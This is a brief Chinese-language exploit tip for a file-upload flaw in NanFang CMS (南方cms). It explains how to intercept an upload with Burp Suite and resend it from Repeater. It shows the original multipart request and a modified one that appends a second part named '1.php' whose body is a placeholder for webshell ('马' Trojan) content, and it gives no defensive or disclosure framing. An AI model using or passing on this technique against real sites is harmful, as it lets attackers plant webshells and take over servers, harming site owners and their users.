这个漏洞在南方cms 上出现的
主要是上传时候利用bp抓包
然后鼠标右键吧数据包发送到Repeater模块
找到你上传的包内容 一般是
------61234564788
Content-Disposition: form-data; name="FileName"; filename=“1.png”
图片内容
------61234564788--
改成
------61234564788
Content-Disposition: form-data; name="FileName"; filename=“1.png”
图片内容
------61234564788
Content-Disposition: form-data; name="FileName1"; filename=“1.php”
马内容
------61234564788--